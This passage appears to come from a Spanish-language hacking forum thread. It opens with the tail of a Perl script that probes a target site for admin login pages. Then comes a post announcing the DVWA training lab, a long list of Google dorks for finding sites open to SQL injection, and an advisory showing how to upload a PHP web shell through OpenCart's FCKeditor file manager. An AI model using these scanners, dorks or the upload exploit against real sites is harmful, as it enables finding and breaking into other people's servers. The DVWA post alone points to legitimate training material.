'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php',
'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php',
'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html',
'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php',
'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php',
'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php',
'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php'
);

foreach $ways(@path2){

$final=$site.$ways;

my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/
){
print " \n [+] Found -> $final\n\n";
}else{
print "[-] Not Found <- $final\n";
}
}
kill("STOP",NULL);
}

#19
[Fuente='Sec-Track']

DVWA (Damn Vulnerable Web Application)  es un reconocido entorno de entrenamiento en explotación de  seguridad Web, que permite estudiar e investigar sobre las diferentes temáticas involucradas en dicho campo.

Ahora se encuentra disponible la versión número 1.0.7, y desde hace algún tiempo se distribuye, además de los archivos , un LiveCD (iso) para facilitar aun más la implementación del entorno de entrenamiento.

Entre las mejoras de esta nueva versión, se destaca la página de ayuda del entorno, la implementación de las prácticas de Blind SQL Injection y la documentación oficial del proyecto.

Las temáticas cubiertas en el Framework, son las siguientes:

Login Brute Force
XSS (Cross-Site Scripting)
LFI (Local File Inclusion)
RFI (Remote File Inclusion)
Command Execution
Upload Script
CSRF (Cross-Site Remote Forgery)
SQL Injection
Blind SQL Injection

Mas info sobre el blog
Web del proyecto
Descarga de DVWA(.iso)(480MB)
#20
Nivel Web / Google Dork para inyecciones SQL
20 Septiembre 2010, 07:28 AM
trainers.php?id=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: session_start()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: preg_match()
"id=" & intext:"Warning: ilesize()
"id=" & intext:"Warning: filesize()
index.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
newsitem.php?num=
top10.php?cat=
historialeer.php?num=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
news_view.php?id=
select_biblio.php?id=
humor.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
communique_detail.php?id=
sem.php3?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
preview.php?id=
loadpsb.php?id=
opinions.php?id=
spr.php?id=
announce.php?id=
participant.php?id=
download.php?id=
main.php?id=
review.php?id=
chappies.php?id=
read.php?id=
prod_detail.php?id=
article.php?id=
person.php?id=
productinfo.php?id=
showimg.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
rub.php?idr=
view_faq.php?id=
artikelinfo.php?id=
detail.php?ID=
index.php?=
profile_view.php?id=
category.php?id=
publications.php?id=
fellows.php?id=
downloads_info.php?id=
prod_info.php?id=
shop.php?do=part&id=
collectionitem.php?id=
band_info.php?id=
product.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
viewshowdetail.php?id=
clubpage.php?id=
memberInfo.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
tradeCategory.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
transcript.php?id=
channel_id=
item_id=
newsid=
trainers.php?id=
news-full.php?id=
news_display.php?getid=
index2.php?option=
readnews.php?id=
newsone.php?id=
product-item.php?id=
pages.php?id=
clanek.php4?id=
viewapp.php?id=
viewphoto.php?id=
galeri_info.php?l=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
story.php?id=
look.php?ID=
aboutbook.php?id=
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: is_writable()
"id=" & intext:"Warning: Unknown()
"id=" & intext:"Warning: mysql_result()
"id=" & intext:"Warning: pg_exec()
"id=" & intext:"Warning: require()
buy.php?category=
pageid=
page.php?file=
show.php?id=
newsitem.php?num=
readnews.php?id=
top10.php?cat=
reagir.php?num=
Stray-Questions-View.php?num=
forum_bds.php?num=
game.php?id=
view_product.php?id=
sw_comment.php?id=
news.php?id=
avd_start.php?avd=
event.php?id=
sql.php?id=
select_biblio.php?id=
ogl_inet.php?ogl_id=
fiche_spectacle.php?id=
kategorie.php4?id=
faq2.php?id=
show_an.php?id=
loadpsb.php?id=
announce.php?id=
participant.php?id=
download.php?id=
article.php?id=
#21
==========================================
Opencart remote file Upload Vulnerability
==========================================

#Exploit Title: Opencart remote file uploade
#Author: Net.Edit0r
#Email: Net.Edit0r@Att.Net ~ Black.Hat.tm@Gmail.com
#Google dork: [inurl:Powered By OpenCart
#Software Link: http://www.opencart.com/index.php?route=download/download
#Platform :linux/php

######################################Iranian HackerZ####################################

# http://target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
# Example site: http://server
# Select the "File Upload" To use = php
# http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
# Sh3ll : http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/shell.php
# OR
# http://server/shell.php

######################################Demo Example####################################

#Demo : http://www.site.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html#
#Demo : http://www.site.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html#

#########################################################################################

#Spical Thanks To >> Darkcoder ~ Classic ~ Jenne bamaram ~ S3Ri0uS ~
_AriaNet_ And All B0x ((Web : ( http://houseofhackers.net/forum/ )))

########################################## End ##########################################